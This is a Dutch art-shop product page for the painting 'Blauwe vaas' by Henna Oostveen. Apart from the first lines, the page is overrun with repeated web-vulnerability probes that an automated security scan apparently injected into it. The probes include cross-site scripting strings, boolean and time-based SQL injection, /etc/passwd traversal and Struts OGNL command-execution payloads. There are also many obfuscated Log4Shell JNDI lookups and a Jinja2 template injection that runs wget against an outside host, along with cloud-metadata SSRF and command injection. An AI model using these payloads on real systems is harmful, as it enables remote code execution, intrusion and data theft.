Blauwe vaas
Blauwe vaas, acryl op doek, 70 x 100
Henna Oostveen
Extra informatie
Gewicht | 1 kg |
---|---|
Afmetingen | 70 × 100 × 2 cm |
Heeft u een vraag?
Neem contact op!Heeft u een vraag?
Neem contact op!Blauwe vaas, acryl op doek, 70 x 100
Henna Oostveen
Gewicht | 1 kg |
---|---|
Afmetingen | 70 × 100 × 2 cm |
Veiligheidsscan ForusP –
_q=random(X155425464Y3_2Z)
Veiligheidsscan ForusP –
‘ onEvent=X155425464Y3_2Z
Veiligheidsscan ForusP –
” onEvent=X155425464Y3_2Z
Veiligheidsscan ForusP –
javascript:qxss(X155425464Y3_2Z);
Veiligheidsscan ForusP –
1 _q_q=random(06NctVfc)
Veiligheidsscan ForusP –
Veiligheidsscan ForusP –
” SRC=//localhost/j363flE6B>
Veiligheidsscan ForusP –
“‘><qssj04mY8MV=7;//<
Veiligheidsscan ForusP –
1″>
Veiligheidsscan ForusP –
BODY{background:url(“javascript:qssm4H1K36m=7”)}
Veiligheidsscan ForusP –
qssyGnWce3B=7
Veiligheidsscan ForusP –
%3cscript z%3e_q(y)%3c/script%3e
Veiligheidsscan ForusP –
<script src=http://localhost/j
Veiligheidsscan ForusP –
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
Veiligheidsscan ForusP –
q
Qualys_resp_hdr_injection: Vulnerable
Veiligheidsscan ForusP –
q
Qualys_resp_hdr_injection: Vulnerable
Veiligheidsscan ForusP –
qualyswasesi
Veiligheidsscan ForusP –
1′
Veiligheidsscan ForusP –
;–
Veiligheidsscan ForusP –
#
Veiligheidsscan ForusP –
/*
Veiligheidsscan ForusP –
“
Veiligheidsscan ForusP –
,
Veiligheidsscan ForusP –
(
Veiligheidsscan ForusP –
1e309
Veiligheidsscan ForusP –
_q=random(X148124996Y3_2Z)
Veiligheidsscan ForusP –
‘ onEvent=X148124996Y3_2Z
Veiligheidsscan ForusP –
” onEvent=X148124996Y3_2Z
Veiligheidsscan ForusP –
javascript:qxss(X148124996Y3_2Z);
Veiligheidsscan ForusP –
1 _q_q=random(3sju7jw2)
Veiligheidsscan ForusP –
” SRC=//localhost/jg396dPG5>
Veiligheidsscan ForusP –
“‘><qssOC8N4XNF=7;//<
Veiligheidsscan ForusP –
BODY{background:url(“javascript:qss04D06H6O=7”)}
Veiligheidsscan ForusP –
qssR5Sj5NzD=7
Veiligheidsscan ForusP –
//….//….//….//….//….//….//….//etc/passwd
Veiligheidsscan ForusP –
php://filter/read=string.rot13/resource=/etc/passwd
Veiligheidsscan ForusP –
….//….//….//….//….//….//etc/passwd
Veiligheidsscan ForusP –
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Veiligheidsscan ForusP –
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Veiligheidsscan ForusP –
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
Veiligheidsscan ForusP –
a(){}phpinfo(); function a
Veiligheidsscan ForusP –
|netstat -an
Veiligheidsscan ForusP –
http://rfitest/
Veiligheidsscan ForusP –
“;(function(){qxssa6Z0Wyne});/**/”
Veiligheidsscan ForusP –
“);(function(){qxsslk6o6573});/**/”
Veiligheidsscan ForusP –
qualys(aqxsscSAEjCOj)xyz
Veiligheidsscan ForusP –
‘;(function(){qxssvo4NOya3});/**/’
Veiligheidsscan ForusP –
9;(function(){qxssQAszL6NX});//
Veiligheidsscan ForusP –
9
;(function(){qxss3s6t0FlF});//
Veiligheidsscan ForusP –
*/;(function(){qxssp5FI4eCW});/*
Veiligheidsscan ForusP –
‘-qxss3DrxSMUI()-‘
Veiligheidsscan ForusP –
“-qxss7g71j6tN()-“
Veiligheidsscan ForusP –
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
Veiligheidsscan ForusP –
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
Veiligheidsscan ForusP –
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
Veiligheidsscan ForusP –
(23.0231*213.759)
Veiligheidsscan ForusP –
<!–#config timefmt="” –>qualyswas:
Veiligheidsscan ForusP –
function(){qxss8dyD6tN9};
Veiligheidsscan ForusP –
http://169.254.169.254/latest/meta-data/
Veiligheidsscan ForusP –
Joe+
bcc:was_engine@d1a17691d03c01852952d984e30f6068694e7cb9.1647394710231792.241763440.smtphi01.smtp.eu1.qualysperiscope.com.
Veiligheidsscan ForusP –
http://cd232432e11ff564e8793ae6612f2211ac54312f.1647394710231792.477196214.ssrf01.ssrf.eu1.qualysperiscope.com.
Veiligheidsscan ForusP –
ping -c 2 d027049c6663a9e68125a226e69ec804f9b3c1fe.1647394710231792.3255369285.oscomm01.oscomm.eu1.qualysperiscope.com.
Veiligheidsscan ForusP –
${jndi:ldap://45cbcb7e2ad99d52ebbe72379710ffce9d18f857.1647394710231792.55642482.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${jndi:rmi://860ed3a120e0198d5158e2b6ee45dedd774823aa.1647394710231792.2283407039.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://c34cc0a191d1dd2be80ac8c7b2c14e91882bb97b.1647394710231792.154092870.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://acb0628febc2ecb4791459590014ff7cfb6b86eb.1647394710231792.3017643571.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${j${::-n}di:ldap${::-:}//e95337fb9732cc72e2895b319c5274db68bce097.1647394710231792.1390049572.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${jnd${123%ff:-${123%ff:-i:}}ldap://49c1587098df5b938b7d426fe76c65b3cf7d8420.1647394710231792.1374629662.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//c6dd16ac246b1fcb887806f5623f0d45d8e3fe7b.1647394710231792.2710620156.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${jndi:dns://1856d46e575a1d402755c8ef24e104bf50fb4888.1647394710231792.1803850796.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//9b71afd62afe5a93eff6b50fb0157dcfb6981d24.1647394710231792.2309114275.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://138bb305b4fb51a4fcdc0589cd090c959981ccbf.1647394710231792.490799223.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c4ded52d66af18135e20139f246cf6dff3af8f28.1647394710231792.994722055.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP –
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://955022ea4614139f50d657834d9b0765939dee00.1647394710231792.2363667391.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
Veiligheidsscan ForusP –
1′) or 2634=2634 —
Veiligheidsscan ForusP –
1′ or 3789=3789 —
Veiligheidsscan ForusP –
1 or 4325=4325 —
Veiligheidsscan ForusP –
1 or NULL IS NULL
Veiligheidsscan ForusP –
1 and NULL IS NULL
Veiligheidsscan ForusP –
1′) or ‘swqtp’=’swqtp
Veiligheidsscan ForusP –
1′ or ‘tpklq’=’tpklq
Veiligheidsscan ForusP –
11 or 11=11
Veiligheidsscan ForusP –
1′ or true() or ‘and’ = ‘and
Veiligheidsscan ForusP –
1 or true() or ‘and’ = ‘and’
Veiligheidsscan ForusP –
1″ or true() or “and” = “and
Veiligheidsscan ForusP –
aaaa&ping -n 92 localhost&
1 –
1
1 –
“‘>
1 –
‘ onEvent=X140021447745280Y3_2Z
1 –
” onEvent=X140021447745280Y3_2Z
1 –
“>
1 –
1″‘>
1 –
z–>
“‘> –
1
‘ onEvent=X140021447745280Y4_2Z –
1
” onEvent=X140021447745280Y4_2Z –
1
1 –
qssnRtiBIBz=7
1 –
%3cscript z%3e_q(y)%3c/script%3e
1 –
qss{{q=(2*2.0)}}qss
1 –
{{333*334}}
1 –
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
1 –
q
Qualys_resp_hdr_injection: Vulnerable
1 –
q
Qualys_resp_hdr_injection: Vulnerable
1 –
qualyswasesi
1 –
1′
1 –
;–
1 –
#
1 –
/*
1 –
“
1 –
,
1 –
(
1 –
1e309
1 –
//….//….//….//….//….//….//….//etc/passwd
1 –
php://filter/read=string.rot13/resource=/etc/passwd
1 –
….//….//….//….//….//….//etc/passwd
1 –
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1 –
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1 –
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1 –
a(){}phpinfo(); function a
1 –
|netstat -an
1 –
http://rfitest/
1 –
“;(function(){qxssTv7uGkHm});/**/”
1 –
“);(function(){qxssjVYN79l5});/**/”
1 –
qualys(aqxsswL05Zn51)xyz
1 –
‘;(function(){qxss9ZbgZjk0});/**/’
1 –
9;(function(){qxssLo8R0y29});//
1 –
9
;(function(){qxss7I17941y});//
1 –
*/;(function(){qxss7MiLrI14});/*
1 –
‘-qxssJiPmaPsC()-‘
1 –
“-qxssEvihugr5()-“
1 –
1!@#$%^&*()
1 –
!@#$%^&*()1
1 –
!@#$%^&*()
1 –
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1 –
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1 –
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
1 –
(23.0231*213.759)
1 –
<!–#config timefmt="” –>qualyswas:
1 –
http://169.254.169.254/latest/meta-data/
1 –
Joe+
bcc:was_engine@64a0c25dba68b1202c7c609b1983899bcce8072d.1768425210231792.439102371.smtphi01.smtp.eu1.qualysperiscope.com.
1 –
http://7bc0525f0e38c61ddc69156fb6df5a5266791153.1768425210231792.1896995010.ssrf01.ssrf.eu1.qualysperiscope.com.
1 –
243912f6b397dd98276c6eb89e5ba51b06d44a66.1768425210231792.199406372.ssrf02.ssrf.eu1.qualysperiscope.com.
1 –
${jndi:ldap://0ad4f415859d11a1ae80c9f8df37281dba6d0f67.1768425210231792.2906698722.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jndi:rmi://76b23bf454f0529b07af877189e5b7edca3d5d4e.1768425210231792.948391649.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://30c23ee10bd9d2e818926226b04eef1161634070.1768425210231792.1584374305.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://f98a51b12cdb29272cb6e537a705fddca24f4adb.1768425210231792.1980643035.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${j${::-n}di:ldap${::-:}//2c265b1167f1083a84431bd24b93d1baef7f2c9f.1768425210231792.3275852027.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jnd${123%ff:-${123%ff:-i:}}ldap://d074498ddec112d653214475b0fb1fab37cd641e.1768425210231792.3219108933.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//4aa76c5dd07b4c0f68e9f73c297674d51c552fa6.1768425210231792.448662097.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jndi:dns://afbe539500867a48b41f8f2971114a49ec173b98.1768425210231792.3228851950.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//ecb4964ef0715d624b6f3f8c04865f1d6ecb2f94.1768425210231792.3818848774.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://bd0efaa13ac63464cd1d177096e4955a624e2bf8.1768425210231792.1251551541.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b14c61188c3a85c9fdad89536d70186921a9fdbc.1768425210231792.2748750068.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://7cffc2a386cf9274cd7cd1d830fa2a5d2a5889a7.1768425210231792.1605257394.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
1 –
1′) or 2634=2634 —
1 –
1′ or 3789=3789 —
1 –
1 or 4325=4325 —
1 –
1 or NULL IS NULL
1 –
1 and NULL IS NULL
1 –
1′) or ‘swqtp’=’swqtp
1 –
1′ or ‘tpklq’=’tpklq
1 –
11 or 11=11
1 –
1′ or true() or ‘and’ = ‘and
1 –
1 or true() or ‘and’ = ‘and’
1 –
1″ or true() or “and” = “and
1 –
aaaa&ping -n 92 localhost&
1 –
ping -c2 -i91 localhost
1 –
|ping -c2 -i56 localhost
1 –
|ping -c2 -i91 localhost|
1 –
1WAITFOR DELAY ’00:00:29′
1 –
1;WAITFOR DELAY ’00:00:29′;
1 –
1);WAITFOR DELAY ’00:00:29′–
1 –
1′;WAITFOR DELAY ’00:00:29′–
1 –
1′);WAITFOR DELAY ’00:00:29′–
1 –
1′,0,0);WAITFOR DELAY’00:00:29′–
1 –
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1 –
1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
1 –
1;SELECT sleep(29); —
1 –
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
1 –
1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime
1 –
1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys
1 –
1′; var djci=sleep(29*1000);//
1 –
1′; var djci=sleep(29*1000) + ‘
1 –
1′ + sleep(29*100*Math.sqrt(100)) + ‘
1 –
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1 –
‘ onEvent=X140530056258384Y3_2Z
1 –
” onEvent=X140530056258384Y3_2Z
“> –
1
1″‘> –
1
z–> –
1
‘ onEvent=X140530056258384Y4_2Z –
1
” onEvent=X140530056258384Y4_2Z –
1
1 –
qss70dma13B=7
script z_q(y)/script –
1
qss{{q=(2*2.0)}}qss –
1
{{333*334}} –
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA –
1
q Qualys_resp_hdr_injection: Vulnerable –
1
qualyswasesi –
1
1′ –
1
;– –
1
# –
1
/* –
1
“ –
1
, –
1
( –
1
1e309 –
1
//….//….//….//….//….//….//….//etc/passwd –
1
php://filter/read=string.rot13/resource=/etc/passwd –
1
….//….//….//….//….//….//etc/passwd –
1
a(){}phpinfo(); function a –
1
|netstat -an –
1
http://rfitest/ –
1
1 –
“;(function(){qxssqOzjBRd3});/**/”
1 –
“);(function(){qxsszQ6l96YJ});/**/”
1 –
qualys(aqxss9B8oWnsv)xyz
1 –
‘;(function(){qxsseYgpw8wn});/**/’
1 –
9;(function(){qxss9Jyfe23Q});//
1 –
9
;(function(){qxss0332zj1k});//
1 –
*/;(function(){qxss72O0gCc0});/*
1 –
‘-qxss2T25j4IO()-‘
1 –
“-qxss06EGYOG9()-“
1!@#$%^&*() –
1
!@#$%^&*()1 –
1
!@#$%^&*() –
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759} –
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} –
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/} /* #set($value=23.0231*213.759) $value */ –
1
(23.0231*213.759) –
1
qualyswas: –
1
http://169.254.169.254/latest/meta-data/ –
1
1 –
Joe+
bcc:was_engine@652a623fd90d20b4e18d3b1321fbc950218d74f6.1891074910231792.4260144807.smtphi01.smtp.eu1.qualysperiscope.com.
1 –
http://30c460fb763c8c4bec04fe3766c07af7419a540b.1891074910231792.2895836594.ssrf01.ssrf.eu1.qualysperiscope.com.
1 –
72fb6c3aab56898ae91a26bff7a6bea0f3a8bd34.1891074910231792.1486900496.ssrf02.ssrf.eu1.qualysperiscope.com.
1 –
${jndi:ldap://42776c2aeddf11912a41d918ef61282aa934480d.1891074910231792.3937801768.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jndi:rmi://08451160cf05b2a91a4bcb548a2065ab8de917a1.1891074910231792.1126332124.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://35dc35b2da3b36ee91c2d6ba699aeeedff2d48ce.1891074910231792.1370870654.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://08ab272c6a5575260c3355af2172ecc3b8abeca5.1891074910231792.385879357.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${j${::-n}di:ldap${::-:}//d478bbc8829f292210e3f0b83b71d681ac8c3150.1891074910231792.856199318.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jnd${123%ff:-${123%ff:-i:}}ldap://b80a9412ba750e4523acd7b7fb2183ec7fa41436.1891074910231792.131447707.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//76e36f9a7f74fe7431d9c837d4a0120cbc7eb35b.1891074910231792.286130878.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${jndi:dns://602f31bdb07e2e3c0fdd8d7f54b3fb5394a94bf7.1891074910231792.2700444057.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//6fa275ef4de80f601dbf21b837f3e21dad0425e1.1891074910231792.4192205300.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://e36cec8231a26610c4989d9dda184bcfd74b0be8.1891074910231792.1918054671.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b92c48285387de8febe02ed31c30060dd5487ed8.1891074910231792.4291267542.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1 –
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://7fe13abd246eedcdd5a6f3b996ff28cdf2254d17.1891074910231792.3780372280.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
1 –
http://localhost:19096
1 –
file:///etc/passwd
1 –
1′) and 2634=1123 —
1 –
1′ and 3789=1391 —
1 –
1 and 4325=2728 —
1 –
1 or 6248 IS NULL
1 –
1 and 7248 IS NULL
1 –
1′) and ‘swqtp’=’ptqws
1 –
1′ and ‘tpklq’=’xqlkp
1 –
11 or 11=12
1 –
1′ and false() and ‘or’ = ‘and
1 –
1 and false() and ‘or’ = ‘and’
1 –
1″ and false() and “or” = “and
aaaa&ping -n 92 localhost& –
1
ping -c2 -i91 localhost –
1
|ping -c2 -i56 localhost –
1
|ping -c2 -i91 localhost| –
1
1WAITFOR DELAY ’00:00:29′ –
1
1;WAITFOR DELAY ’00:00:29′; –
1
1);WAITFOR DELAY ’00:00:29′– –
1
1′;WAITFOR DELAY ’00:00:29′– –
1
1′);WAITFOR DELAY ’00:00:29′– –
1
1′,0,0);WAITFOR DELAY’00:00:29′– –
1